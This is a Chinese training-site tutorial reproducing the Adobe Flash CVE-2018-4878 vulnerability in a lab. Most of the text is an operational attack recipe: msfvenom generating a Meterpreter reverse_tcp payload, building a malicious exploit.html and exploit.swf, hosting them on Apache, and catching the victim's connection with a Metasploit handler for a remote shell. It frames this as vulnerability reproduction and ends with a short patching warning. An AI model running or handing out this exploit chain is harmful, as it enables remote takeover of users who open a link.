摘要:本文主要向大家介绍了Flash基础入门之Adobe Flash cve-2018-4878 的漏洞复现,通过具体的内容向大家展现,希望对大家学习Flash基础入门有所帮助。
本文主要向大家介绍了Flash基础入门之Adobe Flash cve-2018-4878 的漏洞复现,通过具体的内容向大家展现,希望对大家学习Flash基础入门有所帮助。
漏洞概述
2018年2月1日, Adobe官方发布了Adobe Flash
Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe
Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。
***者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打开时便会收到***
此次复现为网页链接的方式进行复现受害者访问我们的flash链接就会被远程代码执行并且直接被getshell
***主机:Kali linux ip:172.16.221.213
受害者主机 window7 ip:172.16.221.247
实验用到的工具会在文章末尾分享
***主机配置
1.首先解压我们用到的文件
unzip CVE-2018-4878-master.zip
2.用msfvenom生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.221.213 LPORT=4444 -f python > code.txt
-p –payload < payload> 指定需要使用的payload
windows/meterpreter/reverse_tcp 我们选择使用的***载荷
LHOST指定ip地址
LPORT指定监听的端口可任意更改
-f –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
(1)查看代码文件
cat code.txt
(2)进入到我们解压用到的文件目录,编辑cve-2018-4878.py文件
修改下面的文件路径
别忘了保存修改并退出
3.python执行脚本文件
python cve-2017-4878-master.py
ls 查看到生成了两个文件
4.启动Apache服务
(1)service apache2 start
我们可以看到已经启动成功了
(2)将我们上两个文件复制到apache2服务的网页目录
cp exlpoit.html /var/www/html/exploit.html
cp exploit.swf /var/www/html/exploit.swf
现在我们的***环境基本配置完成,只要受害者访问我的链接就可以直接被远程控制
5.启动armitage:属于图形化的metasploit也方便演示
(1)使用handler监听模块
use exploit/multi/handler
(2)设置***载荷是我们在生成文件的时候所选择的***载荷
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.221.213 设置***主机的ip
set lport 4444 设置监听端口为4444(我们在用msfvenom生成代码文件是设置的端口)
6.开启监听
exploit
7.windows7安装Adobeflash 28.0 后用浏览器访问//172.16.221.213/exploit.html
8.此时我们可以看到Kali linux已经获取到sessions
复现完成,此时我们就可以查看一下系统配置
当然你也可以不用此图形化直接用命令行(命令都是一样的)
msfconsole 启动
顺便用shell查看下ip地址
在真实环境下,很多***会基于社会工程学诱导用户点击来达到***的目的,也希望大家小心陌生链接及时升级安全补丁,以免造成损失
以上就介绍了Flash的相关知识,希望对Flash有兴趣的朋友有所帮助。了解更多内容,请关注职坐标常用软件Flash频道!
您输入的评论内容中包含违禁敏感词
我知道了
请输入正确的手机号码
请输入正确的验证码
您今天的短信下发次数太多了,明天再试试吧!
我们会在第一时间安排职业规划师联系您!
您也可以联系我们的职业规划师咨询:
版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
沪公网安备 31011502005948号